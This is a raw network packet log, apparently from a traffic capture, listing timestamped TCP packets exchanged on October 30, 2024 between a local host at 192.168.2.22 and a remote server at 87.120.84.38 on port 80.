                                                                                                          Oct 30, 2024 08:14:19.331754923 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331758976 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.331768036 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331779003 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331784964 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.331789970 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331799030 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331805944 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.331809044 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.331824064 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.331845999 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.332716942 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.332776070 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.332778931 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.332788944 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.332818031 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.332823038 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.332828045 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.332838058 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.332858086 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.332876921 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.332921028 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.332931995 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.332941055 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.332961082 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.332966089 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.332978964 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.333003998 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.333005905 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333041906 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.333086967 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333096981 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333106995 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333128929 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.333147049 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.333169937 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333209991 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.333245993 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333256960 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333283901 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.333332062 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333342075 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333384037 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.333468914 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333479881 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333508968 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.333549023 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333559036 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333568096 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333579063 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333590984 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.333759069 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.333822966 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333833933 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333843946 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333859921 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333869934 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.333875895 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.333897114 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.334057093 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334108114 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.334111929 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334124088 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334152937 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.334240913 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334259033 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334270000 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334281921 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334295034 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.334316015 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.334464073 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334476948 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334495068 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334506035 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334517002 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.334517002 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334522963 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334528923 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334533930 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.334538937 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334551096 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334578037 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.334686041 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.334686041 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.334829092 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334872961 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.334887028 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334897995 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334908009 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.334939003 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.334958076 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.491017103 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.491080999 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.491091013 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.491162062 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.491173983 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.491189003 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.491189003 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.491221905 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.491754055 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.491805077 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.491815090 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.491856098 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.491908073 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.491918087 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.491926908 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.491933107 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.491947889 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.491962910 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.492432117 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.492479086 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.492490053 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.492532015 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.492544889 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.492567062 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.492580891 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.492592096 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.492614031 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.492738962 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.493263960 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.493313074 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.493334055 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.493344069 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.493371964 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.493371964 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.493382931 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.493408918 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.493443012 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.493475914 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.493781090 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.493827105 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.493839979 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.493849993 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.493879080 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.493935108 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.493944883 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.493953943 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.493978977 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.493990898 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.494817972 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.494865894 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.494883060 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.494894981 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.494961023 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.494980097 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.494991064 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.495023012 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.495280981 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.495325089 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.495333910 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.495345116 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.495378017 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.495390892 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.495429039 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.495475054 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.495486975 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.495496988 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.495506048 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.495517969 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.495532990 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.495559931 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.496176004 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.496220112 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.496221066 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.496229887 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.496262074 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.496536016 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.496587038 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.496589899 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.496599913 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.496630907 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.496670961 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.496680021 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.496690989 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.496702909 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.496716976 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.497234106 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.497273922 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.497279882 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.497284889 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.497317076 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.497699976 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.497724056 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.497744083 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.497756004 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.497884035 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.497936010 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.497941017 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.497951984 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.497976065 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.497986078 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.497996092 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.498012066 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.498363018 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.498409033 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.498575926 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.498584986 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.498589993 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.498599052 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.498625040 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.498637915 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.498676062 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.498703957 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.498711109 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.498738050 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.499684095 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.499731064 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.499731064 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.499739885 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.499771118 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.499804020 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.499814034 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.499823093 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.499840021 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.499855042 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.500196934 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500228882 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500237942 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500242949 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.500261068 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.500273943 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.500304937 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500314951 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500340939 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.500358105 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500365973 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500370979 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500396013 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.500519991 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500530005 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500540972 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500562906 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.500606060 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.500607967 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500643015 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.500837088 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500880003 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.500883102 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500891924 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500922918 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.500941038 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500951052 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500961065 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.500977993 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.500991106 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.501044989 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.501085043 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.501087904 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.501096964 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.501121044 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.501626968 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.501672029 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.501683950 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.501693964 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.501719952 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.501732111 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.501801014 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.501811028 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.501821995 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.501831055 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.501841068 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.501844883 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.501852036 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.501864910 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.501878977 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.501919031 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.501929045 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.501961946 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.502820015 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.502863884 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.502873898 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.502882957 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.502908945 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.502949953 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.502959967 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.502969980 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.502980947 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.502995968 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.503010035 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.503047943 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.503082037 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.503087044 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.503091097 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.503112078 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.503237009 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.503283024 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.503300905 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.503310919 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.503334999 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.503392935 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.503402948 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.503412008 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.503423929 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.503433943 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.503448963 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.503460884 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.503485918 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.503518105 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.503520966 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.503529072 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.503554106 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.504200935 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504245996 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504246950 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.504256010 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504287004 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.504362106 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504373074 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504378080 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504384041 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504426003 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.504499912 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504508972 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504538059 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504539967 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.504570007 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.504573107 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504584074 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504592896 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504610062 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.504626036 CET4916580192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:14:19.504720926 CET804916587.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:14:19.504730940 CET804916587.120.84.38192.168.2.22
